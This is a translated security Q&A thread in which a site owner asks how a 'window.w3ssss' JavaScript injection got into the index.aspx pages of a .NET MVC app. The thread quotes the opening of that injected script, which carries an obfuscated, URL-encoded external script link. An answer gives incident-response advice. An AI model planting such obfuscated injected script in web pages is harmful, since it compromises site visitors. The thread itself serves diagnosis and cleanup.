¿Cómo ocurre el hackeo de window.w3ssss?

1

Recientemente, una aplicación .Net MVC 2 en nuestro servidor se infectó con un virus / hack, agregó un poco de Javascript a las páginas index.aspx del sitio.

Mientras lo hemos limpiado, no he podido encontrar ninguna información sobre cómo ocurre la infección inicial. Si alguien tiene alguna información sobre cómo ocurre esto (por ejemplo, un exploit de ftp, algún tipo de inyección de código, etc.), hágamelo saber para que se realice una revisión del código, si es necesario.

No tengo un nombre para el virus, pero aquí están las primeras líneas del JavaScript insertado para ayudar a identificarlo.

<div id="w3stats"></div>
<script language="JavaScript" type="text/javascript">
window.w3ssss=function(){
var scriptlink = "http://jquery.googlecode.com/svn/trunk/gadget/scripts/s.js?userrefer=%0A7gw%0Anayies4flsrrd4p%3Du4fdsauogkncu2zutcymahnepbdnkg8t5wd.6ulcwprr5hjef37ace0tfgpe1zlEz19lkt9ey3sm96oeko4nhuvtfy5%282wj%226ofils0fowyrx6wanu4m6ajeinf%22bqs%293e0%3Bd5i%0Ayczieyifqi9rct4.sl6snrzre2ocola%3Dg1q%22cd8h7irth8ltcufpz5g%3Adu6/g4u/wwovvb0cb8p-p74bkadu0krsxuaip6znd9eegtrsghbsejf.ponc8kiocetmh6r/cp8i63lndkg.8rrpbewh9kepdka%22x5n%3B73r%0Av27iar6fht8rpsz.r5ksx1ottjxy2h1ltseeign.s28w7fvisuadzght5mph09w%3Dpr0%22usd1yifpp0vxwar%22vw3%3Bpv6%0Ayljibn8fjdzroab.60ns3llt4ulyxzclfrzektc.wq5hvbsed58if0ygt3dhtaatjsq%3Dqzs%22gxt1y6apeanxndo%225ij%3Bny2%0Acj5dzblow3fcr0gubrrm42geqinnghstuh3.3z6g3thezrgt7m9Enx1ley7e6voma64eph0nl7htxqbB3n7yjtwIs9xdvht%28rph%22ufxwhhm3flks84utufuanldthuks999%2222l%290io.9iga4usp7rxpverebjgnjrbdyezCpugh3eliesil9ncdcer%28wu7itzjfjl3rpqi%29q83%3Bsih%0A4ni%0Akba";
var visitnum=window.history.length%1000-window.history.length+4;
    
pregunta gdrider 03.01.2013 - 13:47
fuente

1 respuesta

3

Al ejecutar el código a través de un decodificador de URL, puede ver que es un JavaScript simple y no un 'virus' específico.

Lo que está viendo es no las acciones o el resultado de la explotación inicial. No se puede determinar el vector de ataque a partir de los resultados. Entraron a través de "algunos medios" y escribieron en archivos en su sistema de archivos. Eso significa que una revisión de código podría no revelar nada. Eso también significa que su solución podría no encontrarse en su código.

¿Cómo entraron? Tal vez la vulnerabilidad del código, SQLi, ssh brute force, FTP, la vulnerabilidad del sistema operativo del servidor, la vulnerabilidad del servicio, el código cargado por terceros, la infección en su máquina a través de la vulnerabilidad de los archivos adjuntos o del navegador, los extraterrestres, el acceso físico, tal vez tenga varias personalidades y sus "modificaciones" no No te diga que reescribieron tu código. CÓMO entraron es el último problema que tienes ahora.

Su primer problema ahora mismo es que alguien tiene el control de su servidor. Copie los registros, apague, vuelva a instalar, aplique parches, cambie las contraseñas, configure un monitoreo adicional y, luego, revise el código para buscar vulnerabilidades.

    
respondido por el schroeder 03.01.2013 - 21:14
fuente

Lea otras preguntas en las etiquetas